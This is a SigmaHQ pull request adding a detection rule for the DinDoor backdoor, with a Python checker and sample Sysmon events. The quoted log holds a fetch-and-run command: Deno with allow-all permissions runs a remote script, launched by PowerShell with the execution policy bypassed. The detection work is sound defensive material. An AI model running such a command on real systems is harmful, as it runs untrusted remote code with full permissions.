new: Dindoor Backdoor Malware rule#6083

Open
marcopedrinazzi wants to merge 5 commits into
SigmaHQ:masterfrom
marcopedrinazzi:dindoor

Conversation

@marcopedrinazzi marcopedrinazzi commented Jun 25, 2026
Contributor

Summary of the Pull Request

Detects Deno launched from PowerShell with full permissions to execute remote JavaScript as observed in DinDoor MSI installer chains.

Changelog

new: DinDoor Backdoor Deno Remote JavaScript Execution From PowerShell

Example Log Event

Process Create:
RuleName: -
UtcTime: 2026-06-25 13:33:39.995
ProcessGuid: {34E9093F-2E33-6A3D-F901-000000000D00}
ProcessId: 5488
Image: C:\Users\marco\AppData\Local\Microsoft\WinGet\Packages\DenoLand.Deno_Microsoft.Winget.Source_8wekyb3d8bbwe\deno.exe
FileVersion: 2.8.3
Description: Deno: A secure runtime for JavaScript and TypeScript
Product: Deno
Company: -
OriginalFileName: deno.exe
CommandLine: "C:\Users\marco\AppData\Local\Microsoft\WinGet\Packages\DenoLand.Deno_Microsoft.Winget.Source_8wekyb3d8bbwe\deno.exe" -A http://example.com/name.js
CurrentDirectory: C:\Users\marco\Desktop\
User: DESKTOP-54JCEU5\marco
LogonGuid: {34E9093F-2978-6A3D-7BDE-010000000000}
LogonId: 0x1de7b
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=71F9647A3BE871E09ADA71049AE754F4,SHA256=C5DB43554211B07181BF92702789466D3403E450CFFC09E123583F1C315063EC,IMPHASH=FAC3C17E0DD2299652A9A1769F310005
ParentProcessGuid: {34E9093F-2E19-6A3D-F601-000000000D00}
ParentProcessId: 9524
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: powershell.exe  -NoProfile -ExecutionPolicy Bypass .\powershell.ps1
ParentUser: DESKTOP-54JCEU5\marco

Fixed Issues

SigmaHQ Rule Creation Conventions

  • If your PR adds new rules, please consider following and applying these conventions
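The detection summarised above, as an added example that is not part of this PR or of the SigmaHQ rule itself: a small Python check that parses Sysmon process-creation events of the kind shown in the example log and flags deno.exe spawned by PowerShell with the allow-all switch (-A or --allow-all) and an HTTP(S) script URL on the command line. The first sample event is the one quoted in this PR, trimmed to the fields the logic reads; the other two are constructed benign launches used as negative cases. Treating pwsh.exe as a PowerShell parent is an assumption added here for coverage, not something the PR states.

```python
import re
from typing import Dict, List

# Sample Sysmon Event ID 1 (Process Create) records. The first is the event
# quoted in the PR description (trimmed to the fields read below); the other
# two are constructed benign launches used as negative cases.
SAMPLE_EVENTS: List[str] = [
    r"""Process Create:
Image: C:\Users\marco\AppData\Local\Microsoft\WinGet\Packages\DenoLand.Deno_Microsoft.Winget.Source_8wekyb3d8bbwe\deno.exe
CommandLine: "C:\Users\marco\AppData\Local\Microsoft\WinGet\Packages\DenoLand.Deno_Microsoft.Winget.Source_8wekyb3d8bbwe\deno.exe" -A http://example.com/name.js
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: powershell.exe  -NoProfile -ExecutionPolicy Bypass .\powershell.ps1
""",
    # Constructed: a developer running a local script with one scoped
    # permission, no allow-all switch and no remote URL.
    r"""Process Create:
Image: C:\Users\dev\.deno\bin\deno.exe
CommandLine: deno run --allow-net .\server.ts
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: powershell.exe
""",
    # Constructed: allow-all, but a local file and a non-PowerShell parent.
    r"""Process Create:
Image: C:\Users\dev\.deno\bin\deno.exe
CommandLine: deno run -A .\build.ts
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: cmd.exe /c build.bat
""",
]

# Deno's "allow everything" switch: short form -A, long form --allow-all.
ALLOW_ALL = re.compile(r"(?:^|\s)(?:-A|--allow-all)(?=\s|$)")
# A script fetched over HTTP(S) instead of read from disk.
REMOTE_SCRIPT = re.compile(r"(?:^|\s)https?://\S+", re.IGNORECASE)
# Parent shells to flag. powershell.exe is what the PR's event shows;
# pwsh.exe (PowerShell 7) is an assumption added for coverage.
POWERSHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe")


def parse_event(text: str) -> Dict[str, str]:
    """Turn the 'Key: Value' lines of a Sysmon event into a dict."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        key, sep, value = line.partition(": ")
        if sep:  # the 'Process Create:' header has no value and is skipped
            fields[key.strip()] = value.strip()
    return fields


def matches_rule(event: Dict[str, str]) -> bool:
    """Deno image, PowerShell parent, allow-all switch and a remote script URL."""
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmdline = event.get("CommandLine", "")
    return (
        image.endswith("\\deno.exe")
        and parent.endswith(POWERSHELL_IMAGES)
        and ALLOW_ALL.search(cmdline) is not None
        and REMOTE_SCRIPT.search(cmdline) is not None
    )


def scan(events: List[str]) -> List[int]:
    """Return the indices of the events that trigger the detection."""
    return [i for i, raw in enumerate(events) if matches_rule(parse_event(raw))]


if __name__ == "__main__":
    for i in scan(SAMPLE_EVENTS):
        ev = parse_event(SAMPLE_EVENTS[i])
        print(f"ALERT event #{i}: {ev['ParentImage']} -> {ev['CommandLine']}")
```

Only the first sample fires: the second lacks both the allow-all switch and a remote URL, and the third has allow-all but a local file and a cmd.exe parent. Requiring all four conditions together is what keeps ordinary developer use of Deno from alerting; if an environment legitimately runs remote Deno scripts from PowerShell, that is where a filter would go.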

@marcopedrinazzi

Contributor Author

deno.zip evtx for regression testing
